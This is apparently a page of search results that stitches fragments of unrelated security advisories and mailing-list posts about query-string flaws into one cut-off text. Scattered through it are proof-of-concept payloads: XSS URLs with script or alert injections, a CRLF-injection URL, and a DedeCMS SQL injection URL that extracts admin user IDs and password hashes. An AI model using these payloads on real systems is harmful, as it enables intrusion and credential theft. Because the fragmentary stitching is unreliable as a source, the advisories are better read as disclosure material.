Next Page >>
query string
support for language internationalization.
3. VULNERABILITY DESCRIPTION
Several parameters (QueryString, option, searchword) in Joomla! Core
components (com_content, com_contact, com_newsfeeds, com_search) are
not properly sanitized upon submission to the /index.php url, which
allows attacker to conduct Cross Site Scripting attack. This may allow
an attacker to create a specially crafted URL that would execute
arbitrary script code in a victim's browser.
UR: http://target/phpmyadmin/db_search.php
Affected Parameter(s): field_str
URL: http://target/phpmyadmin/db_sql.php
Affected Parameter(s): QUERY_STRING, delimiter
URL: http://target/phpmyadmin/db_structure.php
Affected Parameter(s): sort
URL: http://target/phpmyadmin/js/messages.php
Multiple cross site scripting vulnerabilities exist within IBM's Rational ClearQuest Web interface.
VULNERABLE VARIABLES:
=====================
contextid (query string parameter)
schema (query string parameter)
userNameVal ("User Name" text box)
POC URL: http://www.website.com/cqweb/login?/cqweb/main?command=GenerateMainFrame&service=CQ&schema=SCHEMAHERE"; alert('XSS');//&contextid=DATABASECONTEXTHERE"; alert('XSS');//
3. VULNERABILITY DESCRIPTION
The Plesk 7.0 - 8.2 versions contain a flaw that allows a remote cross
site redirection attack. This flaw exists because the application does
not properly parse Query String parameter to set it apart from
webuser@domain.com format upon submission to the default web root url
(/) of the affected domain (i.e www.domain.com/) . To further explain,
when the URL with the format, http://domain.com/?@attacker.in, is
requested, the Plesk mistakenly parses domain.com/? as a web user and
attacker.com as the main domain. This allows an attacker to create a
Multiple vulnerabilities were found in SquirrelMail:
* Niels Teusink reported multiple input sanitation flaws in certain
encrypted strings in e-mail headers, related to
contrib/decrypt_headers.php, PHP_SELF and the query string (aka
QUERY_STRING) (CVE-2009-1578).
* Niels Teusink also reported that the map_yp_alias() function in
functions/imap_general.php does not filter shell metacharacters in a
username and that the original patch was incomplete (CVE-2009-1381,
Multiple vulnerabilities has been discovered and corrected in
phpmyadmin:
libraries/auth/swekey/swekey.auth.lib.php in the Swekey authentication
feature in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1
assigns values to arbitrary parameters referenced in the query string,
which allows remote attackers to modify the SESSION superglobal array
via a crafted request, related to a remote variable manipulation
vulnerability. (CVE-2011-2505).
setup/lib/ConfigGenerator.class.php in phpMyAdmin 3.x before 3.3.10.2
------------------------------------------------------------------------------------------------
URL: http://localhost/etano/search.php
Method: GET
Vulnerable Parameters: QUERY STRING, st, f17_city,f17_country ,
f17_state, f17_zip, f19, wphoto, search, v, return
http://localhost/etano/search.php?'"><script>alert(/XSS/)</script>
I've found that funny result when i try to input some miscellaneous parameters in the query string.
When i try to click the HIGHLIGHTED POSTS in the blog but that entry had no longer exist.
Dear Yahoo,
I've found a bug on your site that i can list all the comments, all the entry belong to the public blog. When i try to click in the HighLighted post in a blog but this entry had no longer existed,
the page result is only the box for comment.
I look at the URL Address, it like this:
http://blog.360.yahoo.com/blog-(blog user encrypted ID)?cq=1&p=
I guest the string that encrypted in the query string is the blog user encrypted ID
Ok so now i try to input the query string paramter like this
http://blog.360.yahoo.com/blog-(blog user encrypted ID)?cq=2&p='
This attempt is stopped with the following two errors in the Web Agent log.
1. Error. No redirect target found in namespace.
2. unable to process FCC parameters. Returning SmNoAction.
SiteMinder only causes a redirect to smpwservices.fcc on certain conditions, it's not accessed directly, and it would not generate a URL with a query string that only includes SMAUTHREASON=<value>.
Or are you attempting to replace SMAUTHREASON=<value> with SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0 in the query string during the normal process with something like burp proxy?
I tested that as well, and the inserted code was ignored and didn't persist to the next step during the process.
Instead of:
“/AuthNeeded/secretfile.asp”
More description:
Why IIS6 and 7 are not vulnerable:
- In these versions, IIS does not accept colon (“:”) character from the URL before the querystring.
Why we cannot use “::$Data” in IIS 5.1 anymore:
- IIS rejects the request if its URL contains “::$” (before querystring).
Why IIS5 is vulnerable to “Directory Authentication Bypass” by using “:$I30:$Index_Allocation”:
Johns Hopkins University and more (http://elgg.org/powering.php)
3. VULNERABILITY DESCRIPTION
Several parameters (page_owner, content,internalname, QUERY_STRING)
are not properly sanitized, which allows attacker to conduct Cross
Site Scripting attack. This may allow an attacker to create a
specially crafted URL that would execute arbitrary script code in a
victim's browser.
1. The IE user's browsing history is compounded of different files
and folders. One of these files is named 'index.dat', and is usually
located at: 'C:\Documents and settings\USERNAME\Local
settings\History\History.IE5\index.dat'. Although the format of this
file is not entirely text, IE will store every visited URL including any
parameters in the query string in plain text.
2. Although the aforementioned folder cannot be directly browsed
using Windows Explorer or Internet Explorer, it can be browsed and
viewed by referring to the same folder using the UNC notation:
'\\[COMPUTERNAME|127.0.0.1]\C$\Documents and settings\USERNAME\Local
settings\History\History.IE5'.
Details.
XOOPS is a content management system written in PHP. During an application
penetration test Sense of Security identified that Input passed to the "op"
parameter of viewpmsg.php, and in the query string of user.php are
vulnerable to Cross-Site Scripting vulnerabilities. This occurred as a
result of the application not properly filtering HTML tags which allowed
malicious JavaScript to be embedded. When input is incorrectly validated and
not properly sanitised and then displayed in a web page, attackers can trick
users into viewing the web page and causing malicious code to be executed.
(4) HtmlInputRadioButton (RenderAttributes), and (5) HtmlSelect
(RenderChildren) (CVE-2008-3422).
CRLF injection vulnerability in Sys.Web in Mono 2.0 and earlier allows
remote attackers to inject arbitrary HTTP headers and conduct HTTP
response splitting attacks via CRLF sequences in the query string
(CVE-2008-3906).
The XML HMAC signature system did not correctly check certain
lengths. If an attacker sent a truncated HMAC, it could bypass
authentication, leading to potential privilege escalation
When the filter detects javascript contained in GET request arguments,
the server responds with an error 500 and a stack trace, which starts
with:
javax.servlet.ServletException: Detected JavaScript tag in
QueryString: "nodename=%3C/title%3E%3CSCRIPT%3E"; decoded:
"nodename=</title><script>"
com.hp.ov.nms.ui.framework.web.HttpContextFilter.assertNoXss(HttpContextFilter.java:282)
com.hp.ov.nms.ui.framework.web.HttpContextFilter.checkForXssAttack(HttpContextFilter.java:237)
With the PoCs above, this filter is evaded by including newline
this issue exists because of an incomplete fix for CVE-2007-3385
(CVE-2007-5333).
Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through
6.0.18, and possibly earlier versions normalizes the target pathname
before filtering the query string when using the RequestDispatcher
method, which allows remote attackers to bypass intended access
restrictions and conduct directory traversal attacks via .. (dot dot)
sequences and the WEB-INF directory in a Request (CVE-2008-5515).
Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0
Google's Javascript implementation v8 uses a hash function which looks
different from the ones seen before, but can be broken using a meet-in-
the-middle attack, too.
Node.js uses v8 to run Javascript-based web applications. The
querystring module parses POST data into a hash table structure.
As node.js does not limit the POST size by default (we assume this would
typically be the job of a framework), no effectiveness/efficiency
measurements were performed.
In the first versions of the HP System Management Homepage (probably <= 2.1.1) there
is a client-side only input validation:
<--- cut here --->
// handle possible active content in the pieces of the query string
for(i=0; i<splitquery.length; i++)
{
splitquery[i] = unescape(splitquery[i]);
splitquery[i] = splitquery[i].replace("\<script\>", "");
splitquery[i] = splitquery[i].replace("\<\/script\>", "");
}
if(empty($arcID) && empty($urlindex)) exit();
......
if(empty($arcID)) $wq = " urlindex = '$urlindex' ";
else $wq = " aid='$arcID' ";
$querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";
$dlist->Init();
$dlist->SetSource($querystring);
...
# http://site.com/[PATH]/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''=
#===========================================================
Hi all,
I have just blogged about a research we recently did on HTTP Parameter
Pollution [1]. I would like to share it with you.
HPP attacks consist of injecting encoded query string delimiters into
other existing parameters. If a web application does not properly
sanitize the user input, a malicious user can compromise the logic of
the application to perform either client-side or server-side attacks.
One consequence of HPP attacks is that the attacker can potentially
override existing hard-coded HTTP parameters to modify the behavior of
> thank you
> best regards
Bogus.
ABSPATH is a defined variable. You can't change its value by using a
query string.
Regards
Problem type : remote
Debian-specific: no
CVE ID : CVE-2012-1172 CVE-2012-1823 CVE-2012-2311
De Eindbazen discovered that PHP, when run with mod_cgi, will
interpret a query string as command line parameters, allowing to
execute arbitrary code.
Additionally, this update fixes insufficient validation of upload
name which lead to corrupted $_FILES indices.
Multiple security vulnerabilities has been identified and fixed
in tomcat5:
Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through
6.0.18, and possibly earlier versions normalizes the target pathname
before filtering the query string when using the RequestDispatcher
method, which allows remote attackers to bypass intended access
restrictions and conduct directory traversal attacks via .. (dot dot)
sequences and the WEB-INF directory in a Request (CVE-2008-5515).
Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0
Problem Description:
A cross-site scripting (XSS) vulnerability was found in AWStats that
allowed remote attackers to inject arbitrary web script or HTML via
the query_string (CVE-2008-3714).
The updated packages have been patched to prevent this issue.
_______________________________________________________________________
References:
A vulnerability has been found and corrected in awstats:
awstats.pl in AWStats 6.8 and earlier does not properly remove quote
characters, which allows remote attackers to conduct cross-site
scripting (XSS) attacks via the query_string parameter. NOTE:
this issue exists because of an incomplete fix for CVE-2008-3714
(CVE-2008-5080).
This update fixes this vulnerability.
_______________________________________________________________________
Problem Description:
CRLF injection vulnerability in Sys.Web in Mono 2.0 and earlier allows
remote attackers to inject arbitrary HTTP headers and conduct HTTP
response splitting attacks via CRLF sequences in the query string.
The updated packages have been patched to fix the issue.
Update:
Details.
The Proofpoint Protection Server offers anti-spam and anti-virus,
connection management, email firewall and policy enforcement features.
A Cross-Site Scripting (XSS) vulnerability has been discovered in the
Proofpoint Protection Server where input is passed to the query string
of process.cgi. This has occurred as a result of the application not
properly filtering HTML tags which allows malicious JavaScript to be
embedded. When input is incorrectly validated and not properly sanitised
and then displayed in a web page, attackers can trick users into viewing
the web page and causing malicious code to be executed.
Bypass using CRLF+Encodings:
---------------------------------------------
Microsoft Windows Internet Explorer 8.0 Beta 2 was designed to stop "Type 1
XSS" attacks. CRLF Injection is also XSS type 1 and is not mitigated by the
filter, though the data in the query string will still be filtered.
This means that if an attacker tries to exploit a CRLF for XSS in the
casual manner, used in this demo:
http://www.linkstofiles.com/crlf.py?url=cookie1%3dvalue1;%0D%0A%0D%0A<html><body>
<script>alert('get it?')</script></body></html>
It is focused on web standards, ease of use, ease of integration, and speed.
3. VULNERABILITY DESCRIPTION
The Query String was not properly sanitized upon submission to the
/index.php url, which allows attacker to conduct Cross Site Scripting
attack.
This may allow an attacker to create a specially crafted URL that
would execute arbitrary script code in a victim's browser.
If a user has already logged in to the application, an XSS attack will
# Bug in ../dora/administartor/yonetim/patron/default.asp
<%
cookFirstLevel = Session("FirstLevelSecurity") 'Ilk Gvenlik Session
cookSecondLevel = Session("SecondLevelSecurity") 'Ikinci Gvenlik Session
queryProc = Request.QueryString("Proc") 'Querystring Tanimi
strPageURL = Replace("/" & Request.ServerVariables("URL"),"//","/") 'Bu Sayfa Adresi
strFirstPass = "sifre1"
strSecondPass = "sifre2"
If fixWord(queryProc) = "" Then 'Eger Query Bos Ise (Normal Sayfa Acilisiysa)
If cookFirstLevel <> 1 and cookSecondLevel <> 1 Then 'Eger 1. ve 2. Seviye Sessionlar 1den Farkliysa
Next Page>>
|
